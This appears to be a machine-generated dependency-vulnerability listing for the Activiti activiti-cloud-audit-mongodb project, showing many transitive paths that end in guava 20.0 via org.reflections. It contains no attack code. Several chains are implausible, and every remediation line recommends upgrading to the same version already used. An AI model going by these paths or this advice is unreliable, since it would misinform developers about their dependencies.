Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-base@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-codec-compression@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-native-unix-common@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-handler@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-epoll@4.2.7.Final › io.netty:netty-transport-classes-epoll@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-io_uring@4.2.7.Final › io.netty:netty-transport-classes-io_uring@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.integration:spring-integration-amqp@7.0.0 › org.springframework.amqp:spring-rabbitmq-client@4.0.0 › com.rabbitmq.client:amqp-client@0.8.0 › io.netty:netty-transport-native-kqueue@4.2.7.Final › io.netty:netty-transport-classes-kqueue@4.2.7.Final › io.netty:netty-transport@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http2@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-codec-http3@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-handler-proxy@4.2.7.Final › io.netty:netty-codec-http@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.projectreactor.netty:reactor-netty-core@1.3.0 › io.netty:netty-resolver-dns@4.2.7.Final › io.netty:netty-codec-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-reactor-netty@4.0.0 › io.projectreactor.netty:reactor-netty-http@1.3.0 › io.netty:netty-resolver-dns-native-macos@4.2.7.Final › io.netty:netty-resolver-dns-classes-macos@4.2.7.Final › io.netty:netty-resolver-dns@4.2.7.Final › org.reflections:reflections@0.9.11 › com.google.guava:guava@20.0Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
